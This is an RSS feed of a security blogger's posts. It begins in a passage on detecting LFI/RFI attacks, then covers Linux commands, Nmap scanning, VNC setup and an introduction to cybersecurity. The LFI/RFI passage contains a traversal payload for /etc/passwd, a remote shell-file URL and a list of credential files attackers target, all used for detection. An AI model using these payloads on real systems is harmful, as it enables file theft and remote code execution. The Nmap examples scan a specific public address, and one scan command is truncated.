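PAGE_PAYLOAD = "/../../../../../../../../../etc/passwd%00"   # the payload from this section

if __name__ == "__main__":
    base = "/var/www/website"
    print(include_path_unsafe(base, "en"), escapes_base(base, "en"))
    print(repr(include_path_unsafe(base, unquote(PAGE_PAYLOAD))), escapes_base(base, unquote(PAGE_PAYLOAD)))
    for value in (PAGE_PAYLOAD, "..%2f..%2fetc%2fpasswd", "http://203.0.113.5/shell.txt", "en"):
        print(value, classify_include_param(value))
```

<p>Two details are worth noticing when you run it. The null byte that ends the string for old PHP is rejected by Python’s open() (ValueError: embedded null byte), which is one reason the %00 trick only worked on older stacks, yet the traversal itself still resolves to /etc/passwd, so the allowlist, not the language, is what prevents the attack. And the double-encoded payload is caught both by the explicit %252e pattern and, more robustly, because the second decoding pass turns it into a plain “../” before the traversal and file-name checks run.</p><p>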
Because a company can suffer serious loss from the exploitation of such vulnerabilities, we need to be able to detect these attacks and take precautions.</p><p>How can we detect LFI and RFI attacks?</p><ul><li><strong>When examining a web request from a user, examine all the fields.</strong> The vulnerable parameter may be in the query string, a POST body, a cookie or a header.</li><li><strong>Check for special characters and traversal sequences: </strong>Within the data received from users, look especially for “../” and “..\”, for absolute paths beginning with “/”, and for their URL encoded forms (“%2e%2e%2f”, “%2e%2e/”, “..%2f”, “%2e%2e%5c”), including double encoded variants such as “%252e%252e%252f”. Also look for a trailing null byte (“%00”).</li><li><strong>Familiarize yourself with files frequently targeted in LFI attacks: </strong>In an LFI attack the attacker reads files that are on the server. Knowing the names of the files attackers go for, such as /etc/passwd, /etc/shadow, /proc/self/environ, web server and application configuration files, and on Windows C:\Windows\win.ini and C:\boot.ini, makes LFI attempts easy to recognize.</li><li><strong>Search for URL schemes such as http:// and https:// inside parameter values: </strong>In an RFI attack the attacker makes the application include a file hosted on his own server and have it executed.</li><li>To host that file, attackers usually start a small web server on their own machine and serve the file over HTTP. This is why a parameter value that contains “http://” or “https://” (or other wrappers such as “ftp://”, “php://” or “data:”) is a strong indicator of an RFI attempt.</li></ul>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Essential Linux Command For all [100+]]]></title>
            <link>https://medium.com/@shiblysadik/essential-linux-command-for-all-100-4330cbdde020?source=rss-79235f7f39d1------2</link>
            <guid isPermaLink="false">https://medium.com/p/4330cbdde020</guid>
            <category><![CDATA[linux]]></category>
            <dc:creator><![CDATA[Shibly Sadik]]></dc:creator>
            <pubDate>Mon, 25 Dec 2023 14:33:24 GMT</pubDate>
            <atom:updated>2023-12-25T14:33:24.121Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/225/1*jtdaT4rkkvZAvkBKLUMwGg.png" /></figure><h3><strong>1. File Operations:</strong></h3><p>~<strong>ls</strong>: Lists all files and directories in the present working directory</p><p>~<strong>ls -R</strong>: Lists files in sub-directories as well</p><p>~<strong>ls -a</strong>: Shows hidden files</p><p>~<strong>ls -al</strong>: Lists files and directories with detailed information like permissions, size, owner, etc.</p><p>~<strong>cd directoryname</strong>: Changes the directory</p><p>~<strong>cd ..</strong>: Moves one level up (<strong>cd</strong> with no argument returns to your home directory)</p><p>~<strong>pwd</strong>: Displays the present working directory</p><p>~<strong>touch filename</strong>: Creates an empty file, or updates the timestamp of an existing one</p><p>~<strong>cat filename</strong>: Displays the file content</p><p>~<strong>cat file1 file2 &gt; file3</strong>: Joins two files (file1 and file2) and stores the output in a new file (file3)</p><p>~<strong>rm filename</strong>: Deletes a file</p><p>~<strong>cp source destination</strong>: Copies files from the source path to the destination path</p><p>~<strong>mv source destination</strong>: Moves or renames files from the source path to the destination path</p><p>~<strong>find / -name filename</strong>: Finds a file or a directory by its name, starting from the root directory</p><p>~<strong>file filename</strong>: Determines the file type</p><p>~<strong>less filename</strong>: Views the file content page by page</p><p>~<strong>head filename</strong>: Views the first ten lines of a file</p><p>~<strong>tail filename</strong>: Views the last ten lines of a file</p><p>~<strong>lsof</strong>: Shows which files are opened by which process</p><p>~<strong>du -h --max-depth=1</strong>: Shows the size of each directory. Use --max-depth=1 to limit the output to the current directory and its immediate children.</p><p>~<strong>fdisk</strong>: Disk partition manipulation command (needs root)</p><h3><strong>2. Directory Operations:</strong></h3><p>~<strong>mkdir directoryname</strong>: Creates a new directory in the present working directory</p><p>~<strong>rmdir directoryname</strong>: Deletes an empty directory (use <strong>rm -r</strong> for a non-empty one)</p><p>~<strong>cp -r source destination</strong>: Copies directories recursively</p><p>~<strong>mv olddir newdir</strong>: Renames directories</p><p>~<strong>find / -type d -name directoryname</strong>: Finds a directory by name, starting from root</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/267/1*KpyPldVdbP6db1Dsc88KqQ.png" /></figure><h3><strong>3. Process Operations:</strong></h3><p>~<strong>ps</strong>: Displays your currently active processes</p><p>~<strong>top</strong>: Displays all running processes, updated live</p><p>~<strong>kill pid</strong>: Sends a signal (SIGTERM by default) to the process with the given pid; <strong>kill -9 pid</strong> forces it to stop</p><p>~<strong>pkill name</strong>: Kills the processes with the given name</p><p>~<strong>bg</strong>: Resumes suspended jobs without bringing them to the foreground</p><p>~<strong>fg</strong>: Brings the most recent job to the foreground</p><p>~<strong>fg n</strong>: Brings job n to the foreground</p><p>~<strong>renice +n pid</strong>: Changes the priority (niceness) of a running process</p><p>~<strong>command &amp;&gt; filename</strong>: Redirects both stdout and stderr of command to the file filename (bash; the portable form is <strong>&gt; filename 2&gt;&amp;1</strong>)</p><p>~<strong>command 1&gt; filename</strong>: Redirects stdout to the file filename</p><p>~<strong>command 2&gt; filename</strong>: Redirects stderr to the file filename</p><h3><strong>4. File Permissions:</strong></h3><p>~<strong>chmod octal filename</strong>: Changes the permissions of a file using an octal mode, one digit each for owner, group and others, where each digit is between 0 (no permissions) and 7 (read, write and execute), e.g. <strong>chmod 640 filename</strong></p><p>~<strong>chown ownername filename</strong>: Changes the file owner</p><p>~<strong>chgrp groupname filename</strong>: Changes the group owner</p><h3><strong>5. Networking:</strong></h3><p>~<strong>ping host</strong>: Pings a host and outputs the results</p><p>~<strong>whois domain</strong>: Gets whois information for a domain</p><p>~<strong>dig domain</strong>: Gets DNS information for a domain</p><p>~<strong>netstat -pnltu</strong>: Lists listening TCP and UDP sockets together with the owning process; netstat can also display connections, routing tables and interface statistics</p><p>~<strong>ifconfig</strong>: Displays the IP addresses of all network interfaces (deprecated on current distributions in favour of <strong>ip addr</strong>)</p><p>~<strong>ssh user@host</strong>: Remote login into host as user</p><p>~<strong>scp</strong>: Transfers files between hosts over SSH</p><p>~<strong>wget url</strong>: Downloads files from the web</p><p>~<strong>curl url</strong>: Sends a request to a URL and returns the response</p><p>~<strong>traceroute domain</strong>: Prints the route that a packet takes to reach the domain</p><p>~<strong>mtr domain</strong>: Combines the functionality of traceroute and ping in a single network diagnostic tool</p><p>~<strong>ss</strong>: Another utility to investigate sockets; a more modern alternative to netstat (<strong>ss -pnltu</strong> takes the same flags as the netstat example above)</p><p>~<strong>nmap</strong>: Network exploration tool and security scanner</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/294/1*mxqfxeJdmDTRE9KvUN_dHg.png" /></figure><h3><strong>6. Archives and Compression:</strong></h3><p>~<strong>tar cf file.tar files</strong>: Creates a tar archive named file.tar containing files</p><p>~<strong>tar xf file.tar</strong>: Extracts the files from file.tar</p><p>~<strong>gzip file</strong>: Compresses file and renames it to file.gz</p><p>~<strong>gzip -d file.gz</strong>: Decompresses file.gz back to file</p><p>~<strong>zip -r file.zip files</strong>: Creates a zip archive named file.zip</p><p>~<strong>unzip file.zip</strong>: Extracts the contents of a zip file</p><h3><strong>7. Text Processing:</strong></h3><p>~<strong>grep pattern files</strong>: Searches for pattern in files</p><p>~<strong>grep -r pattern dir</strong>: Searches recursively for pattern in dir</p><p>~<strong>command | grep pattern</strong>: Pipes the output of command to grep for searching</p><p>~<strong>echo 'text'</strong>: Prints text</p><p>~<strong>sed 's/string1/string2/g' filename</strong>: Prints filename with every string1 replaced by string2 (the file itself is left unchanged)</p><p>~<strong>diff file1 file2</strong>: Compares two files and shows the differences</p><p>~<strong>wc filename</strong>: Counts lines, words and characters in a file</p><p>~<strong>awk</strong>: A versatile pattern-scanning and text-processing language</p><p>~<strong>sed -i 's/string1/string2/g' filename</strong>: Replaces string1 with string2 in filename; the -i option edits the file in place</p><p>~<strong>cut -d':' -f1 /etc/passwd</strong>: Cuts out the first field of each line in /etc/passwd, using the colon as the field delimiter</p><h3><strong>8. Disk Usage:</strong></h3><p>~<strong>df</strong>: Shows disk usage per filesystem</p><p>~<strong>du</strong>: Shows directory space usage</p><p>~<strong>free</strong>: Shows memory and swap usage</p><p>~<strong>whereis app</strong>: Shows possible locations of app</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/225/1*gTFvxoZp7FnSZOWmrYixBw.jpeg" /></figure><h3><strong>9. 
System Info:</strong></h3><p>~<strong>date</strong>: Shows the current date and time</p><p>~<strong>cal</strong>: Shows this month’s calendar</p><p>~<strong>uptime</strong>: Shows the current uptime and load averages</p><p>~<strong>w</strong>: Displays who is logged in and what they are doing</p><p>~<strong>whoami</strong>: Shows who you are logged in as</p><p>~<strong>uname -a</strong>: Shows kernel information</p><p>~<strong>df -h</strong>: Disk usage in human-readable format</p><p>~<strong>du -sh</strong>: Disk usage of the current directory in human-readable format</p><p>~<strong>free -m</strong>: Shows free and used memory in MB</p><h3><strong>10. Package Installation:</strong></h3><p>~<strong>sudo apt-get update</strong>: Updates package lists for upgrades</p><p>~<strong>sudo apt-get upgrade</strong>: Upgrades all upgradable packages</p><p>~<strong>sudo apt-get install pkgname</strong>: Installs pkgname</p><p>~<strong>sudo apt-get remove pkgname</strong>: Removes pkgname</p><h3><strong>11. Others (mostly used in scripts):</strong></h3><p>~<strong>command1 ; command2</strong>: Runs command1 and then command2</p><p>~<strong>command1 &amp;&amp; command2</strong>: Runs command2 only if command1 succeeds</p><p>~<strong>command1 || command2</strong>: Runs command2 only if command1 fails</p><p>~<strong>command &amp;</strong>: Runs command in the background</p><h3><strong>12. Version Control (Git commands):</strong></h3><p>~<strong>git init</strong>: Initializes a local git repository</p><p>~<strong>git clone url</strong>: Creates a local copy of a remote repository</p><p>~<strong>git add filename</strong>: Adds a file to the staging area</p><p>~<strong>git commit -m "Commit message"</strong>: Commits changes with a message</p><p>~<strong>git status</strong>: Checks the status of the working directory</p><p>~<strong>git pull</strong>: Pulls the latest changes from the remote repository</p><p>~<strong>git push</strong>: Pushes changes to the remote repository</p><p>~<strong>git branch</strong>: Lists all local branches</p><p>~<strong>git branch branchname</strong>: Creates a new branch</p><p>~<strong>git checkout branchname</strong>: Switches to a branch</p><p>~<strong>git merge branchname</strong>: Merges a branch into the active branch</p><p>~<strong>git stash</strong>: Stashes changes in a dirty working directory</p><p>~<strong>git stash apply</strong>: Applies changes from a stash</p><p>~<strong>git log</strong>: Views the commit history</p><p>~<strong>git reset</strong>: Resets your HEAD pointer to a previous commit</p><p>~<strong>git rm filename</strong>: Removes a file from version control</p><p>~<strong>git rebase</strong>: Reapplies commits on top of another base tip</p><p>~<strong>git revert</strong>: Creates a new commit that undoes the changes made in a particular commit, and applies it to the current branch</p><p>~<strong>git cherry-pick commitID</strong>: Applies the changes introduced by some existing commits</p><h3><strong>13. Environment Variables:</strong></h3><p>~<strong>env</strong>: Displays all environment variables</p><p>~<strong>echo $VARIABLE</strong>: Displays the value of an environment variable</p><p>~<strong>export VARIABLE=value</strong>: Sets the value of an environment variable for the shell and the processes it starts</p><p>~<strong>alias new_command="old_command options"</strong>: Creates a new command that executes the old command with the specified options</p><p>~<strong>echo $PATH</strong>: Prints the PATH environment variable</p><p>~<strong>export PATH=$PATH:/new/path</strong>: Adds /new/path to the end of the PATH (appending rather than prepending keeps a directory writable by others from shadowing system binaries)</p><h3><strong>14. Job Scheduling (Cron Jobs):</strong></h3><p>~<strong>crontab -l</strong>: Lists all your cron jobs</p><p>~<strong>crontab -e</strong>: Edits your cron jobs</p><p>~<strong>crontab -r</strong>: Removes all your cron jobs (no confirmation is asked)</p><p>~<strong>crontab -v</strong>: Displays the last time you edited your cron jobs (not available in every cron implementation)</p><p>~<strong>crontab file</strong>: Installs the cron jobs listed in file, replacing the current crontab</p><p>~<strong>@reboot command</strong>: Inside a crontab, schedules command to run at startup</p><h3><strong>15. Package Installation (using pip, the Python package installer):</strong></h3><p>~<strong>pip install packagename</strong>: Installs a Python package</p><p>~<strong>pip uninstall packagename</strong>: Uninstalls a Python package</p><p>~<strong>pip freeze &gt; requirements.txt</strong>: Writes the installed packages and their exact versions into a requirements file</p><p>~<strong>pip install -r requirements.txt</strong>: Installs packages from a requirements file</p><h3><strong>16. System Monitoring and Performance:</strong></h3><p>~<strong>iostat</strong>: Reports CPU statistics and input/output statistics for devices, partitions and network filesystems</p><p>~<strong>vmstat</strong>: Reports information about processes, memory, paging, block I/O, traps, disks and CPU activity</p><p>~<strong>htop</strong>: An interactive process viewer for Unix systems; a more user-friendly alternative to top</p><h3><strong>17. Search and Find:</strong></h3><p>~<strong>locate filename</strong>: Finds a file by its name using a database that is refreshed by the updatedb command</p><p>~<strong>whereis programname</strong>: Locates the binary, source and manual page files for a command</p><p>~<strong>which commandname</strong>: Shows the full path of (shell) commands</p><h3><strong>18. Compression / Archives:</strong></h3><p>~<strong>tar -cvf archive.tar dirname/</strong>: Creates a tar archive</p><p>~<strong>tar -xvf archive.tar</strong>: Extracts a tar archive</p><p>~<strong>tar -jcvf archive.tar.bz2 dirname/</strong>: Creates a bzip2-compressed archive</p><p>~<strong>tar -jxvf archive.tar.bz2</strong>: Extracts a bzip2-compressed archive</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Nmap an information gathering tool]]></title>
            <link>https://medium.com/@shiblysadik/nmap-an-information-gathering-tool-958a6cd2196d?source=rss-79235f7f39d1------2</link>
            <guid isPermaLink="false">https://medium.com/p/958a6cd2196d</guid>
            <category><![CDATA[tools]]></category>
            <category><![CDATA[nmap]]></category>
            <category><![CDATA[information-gathering]]></category>
            <dc:creator><![CDATA[Shibly Sadik]]></dc:creator>
            <pubDate>Sat, 23 Dec 2023 15:43:50 GMT</pubDate>
            <atom:updated>2023-12-23T15:43:50.555Z</atom:updated>
            <content:encoded><![CDATA[<h3>What is Nmap?</h3><p>Nmap is short for Network Mapper. It is an open-source command-line tool (available for Linux, Windows and macOS) used to discover hosts, scan ports and identify the services and versions running on them.</p><p>Nmap lets network admins find which devices are on their network, discover open ports and services, and, through its scripting engine, check for known vulnerabilities and misconfigurations.</p><p>Nmap has become hugely popular, being featured in movies like The Matrix and the popular series Mr. Robot.</p><h3>Why use Nmap?</h3><p>There are a number of reasons why security pros prefer Nmap over other scanning tools.</p><p>First, Nmap helps you to quickly map out a network without sophisticated commands or configurations. It supports both simple commands (for example, to check whether a host is up) and complex scripting through the Nmap Scripting Engine (NSE).</p><p>Other features of Nmap include:</p><ul><li>Ability to quickly recognize all the devices, including servers, routers, switches and mobile devices, on one or more networks.</li><li>Identification of services running on a system, including web servers, DNS servers and other common applications. Nmap can also detect application versions with reasonable accuracy, which helps in matching them against known vulnerabilities.</li><li>Operating system fingerprinting. Nmap can estimate the OS and version running on a device, which helps in planning the next steps of a penetration test.</li><li>During security auditing and vulnerability scanning, you can use the scripts shipped with the Nmap Scripting Engine to probe systems for specific weaknesses.</li><li>A graphical front end called Zenmap, which helps you build visual maps of a network for usability and reporting.</li></ul><h3>Basic scans</h3><p>Listing the active devices on a network is the first step in network mapping. 
There are two basic scans you can use for that:</p><ul><li><strong>Ping scan — </strong>Lists the devices that are up on a given host or subnet without scanning any ports. The <strong>-sP</strong> flag still works but is a deprecated alias; current Nmap releases call this <strong>-sn</strong>.</li></ul><pre>nmap -sP 103.60.173.170</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/901/1*VhPcxAVmmxQ6gtnectjE8w.png" /></figure><p><strong>Scan a single host — </strong>Scans the 1,000 most common TCP ports on a single host. These are the ports used by popular services such as SQL databases, SNTP, Apache and others.</p><pre>nmap 103.60.173.170</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/901/1*-xZA7xT1f4PhAN2KpUpBWA.png" /></figure><h3>Stealth scan</h3><p>A stealth (SYN) scan sends a TCP SYN packet to each port and examines the response. A SYN/ACK means the port is open; Nmap then answers with a RST instead of completing the handshake, so no full TCP connection is ever established and the application behind the port never sees (or logs) a connection.</p><p>Because the three-way handshake is never completed, a SYN scan is less visible to the target application than a connect scan, but it is not invisible: firewalls and intrusion detection systems see the half-open connections clearly.</p><pre>sudo nmap -sS 103.60.173.170</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/899/1*RqHc4AUQ-y2HuZDbk-AAPQ.png" /></figure><p>Use the <strong>-sS</strong> flag to perform a SYN scan. It needs raw-socket privileges, which is why the command is run with sudo; when Nmap runs as root, -sS is already the default scan type. Despite the “stealth” name it is actually the fastest scan type, since it never waits for full connections to be set up and torn down.</p><h3>Version scanning</h3><p>Finding application versions is a crucial part of penetration testing.</p><p>It makes your life easier since you can look up existing vulnerabilities for a particular service version in the <a href="https://cve.mitre.org/">Common Vulnerabilities and Exposures (CVE)</a> database and then test them with an exploitation framework such as <a href="https://en.wikipedia.org/wiki/Metasploit_Project">Metasploit</a>.</p><pre>nmap -sV 103.60.173.170</pre><p>To do a version scan, use the <strong>-sV</strong> flag. Nmap will list each service together with the version it detected. 
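The following POSIX shell functions are an added example, not part of the original post: they parse Nmap’s greppable output (the -oG format, which nmap -oG - writes to stdout) so that the results of the ping scan and the version scan above can be filtered on the command line. The scan text embedded in sample_greppable is constructed for the example and is not a real result from the host scanned in this post.

```shell
#!/bin/sh
# Added example, not from the original post: parse Nmap greppable (-oG) output.
# Real usage:  nmap -sV -oG - 103.60.173.170 | open_ports
#              nmap -sn -oG - 103.60.173.0/24 | hosts_up
# The scan text returned by sample_greppable is constructed, not a real result.

sample_greppable() {
    printf '%s\n' '# Nmap 7.94 scan initiated (constructed sample)'
    printf 'Host: 103.60.173.170 ()\tStatus: Up\n'
    printf 'Host: 103.60.173.170 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, 80/open/tcp//http//Apache httpd 2.4.52/, 443/closed/tcp//https///, 3306/filtered/tcp//mysql///\tIgnored State: closed (996)\n'
    printf 'Host: 103.60.173.171 ()\tStatus: Up\n'
    printf 'Host: 103.60.173.171 ()\tPorts: 3389/open/tcp//ms-wbt-server///\tIgnored State: filtered (999)\n'
    printf '%s\n' '# Nmap done (constructed sample) -- 2 IP addresses (2 hosts up) scanned'
}

# hosts_up: print the address of every host reported as up (what a ping scan gives you).
# -oG fields are tab-separated; the first is "Host: <ip> (<name>)".
hosts_up() {
    awk -F'\t' '/^Host:/ && $2 == "Status: Up" { split($1, h, " "); print h[2] }'
}

# open_ports: print "ip port/proto service version" for every open port.
# Each port entry in -oG output has seven slash-separated fields:
#   port/state/protocol/owner/service/rpc-info/version/
open_ports() {
    awk -F'\t' '/^Host:/ && $2 ~ /^Ports: / {
        split($1, h, " "); ip = h[2]
        sub(/^Ports: /, "", $2)
        n = split($2, entries, ", ")
        for (i = 1; i <= n; i++) {
            split(entries[i], f, "/")
            if (f[2] != "open") continue
            ver = ""
            if (f[7] != "") ver = " " f[7]
            printf "%s %s/%s %s%s\n", ip, f[1], f[3], f[5], ver
        }
    }'
}

sample_greppable | hosts_up
sample_greppable | open_ports
```

The filter on the state field is what makes this useful on a real scan: closed and filtered ports, which make up most of a default 1,000-port scan, are dropped, and what remains is the list of services to research in the CVE database.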
Keep in mind that version detection is not always 100% accurate, but it takes you one step closer to successfully getting into a system.</p><h3>Aggressive Scanning</h3><p>Nmap has an aggressive mode that enables OS detection, version detection, default script scanning and traceroute in one go. Use the <strong>-A</strong> argument to perform an aggressive scan.</p><pre>nmap -A 103</pre><p>Aggressive scans provide far more information than regular scans. However, an aggressive scan also sends many more probes, so it is noisier and more likely to be detected by the target, and it should only be run against systems you are authorized to test.</p><h3>Scanning Multiple Hosts</h3><p>Nmap can scan many hosts in one run, which comes in handy when you manage a large network.</p><p>You can specify multiple targets in several ways:</p><ul><li>List the IP addresses on a single command line to scan all of them in the same run.</li></ul><pre>nmap 192.164.1.1 192.164.0.2 192.164.0.3</pre><ul><li>Use the asterisk (*) as a wildcard for an octet, for example to scan every host in a /24.</li></ul><pre>nmap 192.164.1.*</pre><p>Use commas to list several values for the last octet instead of typing the whole address each time.</p><pre>nmap 192.164.0.1,2,3,4</pre><p>Use a hyphen to specify a range for an octet.</p><pre>nmap 192.164.0.0-255</pre><h3>Conclusion</h3><p>Nmap is clearly the “Swiss Army Knife” of networking, thanks to its inventory of versatile commands.</p><p>It lets you quickly scan and discover essential information about your network, hosts, ports, firewalls and operating systems.</p><p>Nmap has numerous settings, flags and preferences that help system administrators analyze a network in detail.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Implement VNC Technique]]></title>
            <link>https://medium.com/@shiblysadik/implement-vnc-technique-c0a45089d8de?source=rss-79235f7f39d1------2</link>
            <guid isPermaLink="false">https://medium.com/p/c0a45089d8de</guid>
            <category><![CDATA[tightvnc]]></category>
            <category><![CDATA[vnc-viewer]]></category>
            <category><![CDATA[vnc]]></category>
            <dc:creator><![CDATA[Shibly Sadik]]></dc:creator>
            <pubDate>Sun, 03 Dec 2023 20:08:15 GMT</pubDate>
            <atom:updated>2023-12-03T20:08:15.328Z</atom:updated>
            <content:encoded><![CDATA[<p>Implementing VNC (Virtual Network Computing) involves running a VNC server on the machine whose desktop you want to reach (Kali Linux, the host, in this case) and a VNC viewer on the machine you connect from (Windows, in the virtual machine). Here are the general steps using TightVNC, a popular VNC server and client:</p><h3>On Kali Linux (Host):</h3><ol><li><strong>Install TightVNC Server:</strong></li></ol><pre>$ sudo apt-get update<br>$ sudo apt-get install tightvncserver</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/499/1*_e_MNXMGHUBE69leDRIysg.png" /><figcaption>Try this to install</figcaption></figure><p><strong>2. Start the VNC server:</strong></p><pre>$ tightvncserver</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/612/1*w929PtD8H8uFcUhzPye2tw.png" /><figcaption>VNC server is ready</figcaption></figure><ul><li>The first time you run it you will be prompted to set a password for VNC access. Classic VNC authentication only uses the first 8 characters of the password, and the password is stored only lightly obfuscated in ~/.vnc/passwd, so treat it as a weak secret and do not reuse a real password.</li><li>The server starts a new X display, normally :1, and listens on TCP port 5900 plus the display number, so display :1 is port 5901.</li></ul><p><strong>3. Configure VNC to Start at Boot (Optional):</strong></p><p>The Linux tightvncserver script has no -service option (those flags belong to the TightVNC server for Windows). On Kali, start it at boot with an @reboot entry in your user’s crontab, or write a systemd unit for it:</p><pre>$ (crontab -l 2&gt;/dev/null; echo "@reboot /usr/bin/tightvncserver :1") | crontab -</pre><h3>On Windows (Virtual Machine):</h3><ol><li><strong>Download and Install TightVNC Viewer:</strong> Download the installer from the <a href="https://www.tightvnc.com/download.php">official TightVNC website</a> and install it on your Windows virtual machine.</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*JtrVTXheBk_0-BUv9a8YjQ.png" /></figure><ol><li><strong>Connect to Kali Linux (Host):</strong> Open TightVNC Viewer on your Windows machine and enter the IP address of your Kali Linux host followed by the port number. The default is port 5901 (display :1), but it will be different if you started the server on another display. 
For example</li></ol><pre>&lt;Kali_IP_Address&gt;:5901</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*EGIOj6xdHO4mKHRe45W7Ww.png" /></figure><p>Enter the VNC password you set earlier.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*7wnj0KPWU3Vd1MDRVTmdaA.png" /></figure><ol><li><strong>Access Kali Linux Desktop:</strong> Once connected, you should see the Kali Linux desktop on your Windows machine.</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*OQrn5ChQ3Xq8KpVvwzMzZA.png" /><figcaption>For security reasons the screen is blank.</figcaption></figure><h3>Note:</h3><ul><li>Ensure that the Kali Linux firewall allows VNC traffic (port 5901 by default), and only from the viewer’s address.</li><li>Adjust the resolution and display settings when starting the VNC server if needed (for example with the -geometry option).</li><li>Be cautious about security: VNC itself is not encrypted and its password exchange is a weak challenge-response, so anyone on the network path can capture the session. Use it only on a trusted network, or start the server with the -localhost option and reach it through an SSH tunnel (forward a local port to port 5901 on the Kali host with ssh -L), which keeps the VNC port off the network entirely.</li><li>Stop the server when you are done (tightvncserver -kill :1) rather than leaving a remote desktop service listening.</li><li>Always keep your software up to date, including the VNC server and viewer.</li></ul><p>Remember, using remote access tools comes with security implications, and it’s crucial to secure your system appropriately, especially when working with penetration testing tools like Kali Linux. Always use such tools responsibly and in accordance with applicable laws and policies.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Introduction to Cyber Security]]></title>
            <link>https://medium.com/@shiblysadik/introduction-to-cyber-security-1fe617e8e403?source=rss-79235f7f39d1------2</link>
            <guid isPermaLink="false">https://medium.com/p/1fe617e8e403</guid>
            <category><![CDATA[cia]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <dc:creator><![CDATA[Shibly Sadik]]></dc:creator>
            <pubDate>Wed, 29 Nov 2023 19:03:34 GMT</pubDate>
            <atom:updated>2023-11-29T19:03:34.709Z</atom:updated>
            <content:encoded><![CDATA[<p>What is cyber security?</p><p>As we become increasingly connected through the Internet, via our computers, our phones and even household devices, security has become a hot topic. Attacks can come from any corner. What happens if someone gains control of your computer or phone? Or of just your Google account?</p><p>At the enterprise level, attacks on computer systems can breach millions of pieces of personal data, including credit card information. Governments are also vulnerable to attacks that expose sensitive data.</p><p>Cybersecurity involves everyone and every entity, from you and your neighbors to organizations, companies and governments.</p><p>The Internet has completely revolutionized the way we communicate with each other and share information. Many of us spend hours on social media and in online group chats. Nearly all institutions have some sort of computer system to keep track of accounts, and buying and selling things on the Internet is now the norm. One by one, even medical equipment, transportation systems and vacuum cleaners are connected to the web.</p><h3>What is Cybersecurity, exactly?</h3><p>There’s no turning back, even as more connections to the Internet lead to more privacy concerns and security risks. We don’t want strangers to access our accounts or our credit card numbers. Along with practicing personal security, organizations and businesses also need to do their part to implement the right protections.</p><p><em>Cybersecurity</em> is the field of study and practice that responds to these challenges as technology evolves. In a formal definition by Cisco:</p><blockquote><em>“Cybersecurity is the practice of protecting systems, networks, and programs from digital attacks.”</em></blockquote><p>Digital attacks cover a whole range, from fraudulent emails to a targeted shutdown of a website’s traffic. 
Defenses against these attacks, then, must be learned and implemented at all levels.</p><h3>The CIA Triad</h3><p>A basic, overarching model for cybersecurity, particularly as it relates to information, is the <a href="https://www.forcepoint.com/cyber-edu/cia-triad">CIA Triad</a>. CIA stands for Confidentiality, Integrity, and Availability (not the US Central Intelligence Agency). Nearly all information security policies trace back to this model. Let’s go through each component of the triad.</p><h4>Confidentiality</h4><p>This pillar of the triad refers to protecting private information from eyes that shouldn’t have access to it. Confidentiality is about enforcing access: who may see this, and who may not? For example, we don’t want to give our social security number to just anyone, but we trust that the institutions we give it to, like tax services, implement the right security measures to keep it secret. So what tools are used to guarantee the right access?</p><p>Some of the ways confidentiality is managed are:</p><ul><li>Defining levels of access and setting permissions</li><li>Encrypting data and files</li><li>Requiring multi-factor authentication</li></ul><h4>Integrity</h4><p>Integrity here means data integrity. We need security controls that protect data from being changed or deleted without authorization, and we must be able to reverse the damage if data was changed accidentally or by the wrong person. Some techniques related to integrity are:</p><ul><li>Keeping backups of the data in its correct state, and logging versions</li><li>Using cryptographic hashes to detect changes</li><li>Using digital signatures to prove the integrity and origin of data</li></ul><h4>Availability</h4><p>This last pillar refers to data being consistently and reliably available to those authorized to use it. For example, when you log in to a social media account and want to adjust your privacy settings, you expect all the settings you set before to appear immediately. The social media company ensures that even under high traffic, the information reaches your screen. How is this accomplished?</p><ul><li>Continuously monitoring servers and networks</li><li>Maintaining hardware and software</li><li>Having a plan for disaster recovery</li></ul><h3>The Cybersecurity Industry</h3><p>Cybersecurity is becoming a broader field as more industries migrate onto the Internet and become part of the digital landscape. That means there are cybersecurity needs in nearly every industry, in addition to cybersecurity being an industry itself. Security roles are no longer just the hacker stereotype of cracking into systems and writing code all the time; cybersecurity as a whole encompasses many skills that work together.</p><p>In this article, we’ll break down some of the big domains in the cybersecurity industry. There is a lot of overlap between different domains and cybersecurity careers, so keep in mind that the domains are not drawn with hard lines, especially as they keep evolving.</p><h3>Security engineering</h3><p>This section refers to the technical implementation of various forms of security.</p><ul><li><a href="https://www.cisco.com/c/en/us/products/security/what-is-information-security-infosec.html">Information security</a>, or InfoSec, protects data in any form from being accessed, modified, shared or deleted by the wrong people.</li><li><a href="https://www.cisco.com/c/en/us/products/security/what-is-network-security.html?dtid=osscdc000283">Network security</a> is concerned with the network infrastructure of an organization, guarding against unauthorized access and interception of data.</li><li><a href="https://www.cisco.com/c/en/us/solutions/security/application-first-security/what-is-application-security.html">Application security</a> refers to implementing measures that defend an application (mobile, desktop or web) from attack, including both software and 
